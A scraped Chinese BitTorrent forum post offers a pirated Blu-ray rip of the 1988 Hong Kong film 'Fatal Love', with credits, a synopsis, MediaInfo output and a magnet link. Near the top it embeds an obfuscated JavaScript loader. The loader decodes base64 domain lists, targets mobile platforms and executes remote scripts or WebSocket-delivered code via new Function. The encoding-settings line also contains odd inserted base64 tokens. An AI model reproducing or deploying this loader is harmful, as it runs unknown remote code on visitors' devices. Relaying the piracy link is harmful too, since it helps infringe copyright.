杀之恋[粤语音轨/中文字幕].Fatal.Love.1988.1080p.BluRay.x264.DTS.2Audio-PTH.迅雷下载 10.40GB

版主小s 1月前 328

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 杀之恋 / Fatal Love

◎片 名 殺之戀

◎年 代 1988

◎产 地 中国香港

◎类 别 爱情 / 惊悚

◎语 言 粤语

◎上映日期 1988-08-11(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0096078/

◎豆瓣评分 7.3/10 (5731人评价)

◎豆瓣链接 https://movie.douban.com/subject/1298334/

◎片 长 92 分钟

◎导 演 梁普智 Po-Chih Leong (id:1289819)

◎编 剧 刘大智 Dai-Chi Lau (id:1379111)

唐素芬 Zevia Tong (id:1379112)

李康华 Kong-wah Lee (id:1379113)

李默 Mo Li (id:1359808)

黄百鸣 Raymond Wong (id:1275277)

◎演 员 张国荣 Leslie Cheung (id:1003494)

钟楚红 Cherie Chung (id:1005541)

柏安妮 Ann Bridgewater (id:1275326)

胡大为 David Wu (id:1301332)

黄锦燊 Melvin Wong (id:1037445)

郭追 Philip Kwok (id:1028425)

琦琦 Sophia Kao (id:1343519)

西瓜刨 Gwa-pau Sai (id:1220481)

左燕翎 Yin-Ling Joh (id:1324728)

卢雄 Paul Lo (id:1377025)

欧阳莎菲 Sha-fei Ouyang (id:1059967)

黄卓玲 Ruby Wong (id:1301203)

肯·博伊尔 Ken Boyle (id:1314275)

钟慧冰 Maria Chung (id:1342035)

金彪 Biu Gam (id:1363426)

许英秀 YingSau Hui (id:1345371)

梁普智 Po-Chih Leong (id:1289819)

伍国健 Kwok-kin Ng (id:1418713)

黄百鸣 Raymond Wong (id:1275277)

林敏怡 Man Yee Lam (id:1289301)

陈仲秋 Paul Chan (id:1377246)

陈木胜 Benny Chan (id:1274293)

◎标 签 张国荣 / 钟楚红 / 香港 / 香港电影 / 爱情 / 哥哥 / 張國榮 / 1988

◎简 介

月黑风高的夜晚,戚志广(张国荣饰)独自行驶在路上,电台里播放着鬼故事,这时车子突然驶离轨道,戚停下车检查,等他再次上车后蓦地发现后座竟多了个清纯的白衣女子(钟楚红饰)!

下车后,白衣女子突然主动向惊魂未定的戚志广献上热吻,待戚带其去舞厅后伊人却随即失去了踪影。经此一见,戚像失了魂般心中全是佳人的影子,并在第二天回到旧地寻找。不料找到的却是一座坟冢。

尽管朋友们都说戚是大白天撞鬼,戚还是对白衣女子念念不忘,他在街上苦候数日,终于发现了她的踪影,而此时她的身份是亿万富翁曹三(黄锦荣饰)的情人?戚决定不论人鬼,都要对女郎展开不舍不弃的追求……

◎获奖情况 (共2项)

第25届台北金马影展 (1988)

金马奖 最佳摄影(提名)

└──黄永恒 (id:1300411)

└──陈仲秋 (id:1377246)

金马奖 最佳音效(提名)

  1. General

  2. Unique ID : 237546602016973549535954509816881807900 (0xB2B5CFB7FD1275C7CDC5616235F9021C)

  3. Complete name : Fatal.Love.1988.1080p.BluRay.x264.DTS.2Audio-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.4 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate : 16.0 Mb/s

  9. Movie name : Fatal Love 1988

  10. Encoded date : UTC 2021-06-26 01:36:50

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 32 min

  25. Bit rate : 13.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 032 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 24.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.273

  36. Stream size : 8.41 GiB (81%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : DTS

  45. Format/Info : Digital Theater Systems

  46. Codec ID : A_DTS

  47. Duration : 1 h 32 min

  48. Bit rate mode : Constant

  49. Bit rate : 1 510 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossy

  56. Stream size : 1 003 MiB (9%)

  57. Title : Cantonese

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : DTS

  64. Format/Info : Digital Theater Systems

  65. Codec ID : A_DTS

  66. Duration : 1 h 32 min

  67. Bit rate mode : Constant

  68. Bit rate : 1 510 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : C L R Ls Rs LFE

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 93.750 FPS (512 SPF)

  73. Bit depth : 24 bits

  74. Compression mode : Lossy

  75. Stream size : 1 003 MiB (9%)

  76. Title : Mandarin

  77. Language : Chinese

  78. Default : Yes

  79. Forced : No


  80. Text #1

  81. ID : 4

  82. ID in the original source medium : 4609 (0x1201)

  83. Format : PGS

  84. Muxing mode : zlib

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 30 min

  88. Bit rate : 26.3 kb/s

  89. Count of elements : 1469

  90. Stream size : 17.1 MiB (0%)

  91. Title : chs

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No

  95. Original source medium : Blu-ray


  96. Text #2

  97. ID : 5

  98. ID in the original source medium : 4608 (0x1200)

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 29 min

  104. Bit rate : 27.3 kb/s

  105. Count of elements : 1467

  106. Stream size : 17.5 MiB (0%)

  107. Title : cht

  108. Language : Chinese

  109. Default : Yes

  110. Forced : No

  111. Original source medium : Blu-ray


  112. Text #3

  113. ID : 6

  114. ID in the original source medium : 4610 (0x1202)

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 29 min

  120. Bit rate : 28.7 kb/s

  121. Count of elements : 1465

  122. Stream size : 18.4 MiB (0%)

  123. Language : English

  124. Default : Yes

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Menu

  128. 00:00:00.000 : Chapter 01

  129. 00:08:37.750 : Chapter 02

  130. 00:16:08.375 : Chapter 03

  131. 00:22:40.375 : Chapter 04

  132. 00:32:20.416 : Chapter 05

  133. 00:39:01.916 : Chapter 06

  134. 00:49:19.416 : Chapter 07

  135. 00:57:40.541 : Chapter 08

  136. 01:07:01.291 : Chapter 09

  137. 01:15:34.916 : Chapter 10

  138. 01:22:12.166 : Chapter 11

  139. 01:27:57.750 : Chapter 12


TAGS 惊悚 爱情

磁力链:
  • magnet:?xt=urn:btih:BCD2EE315F437E06281ABD9C5E4C6E3C83E1F251
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回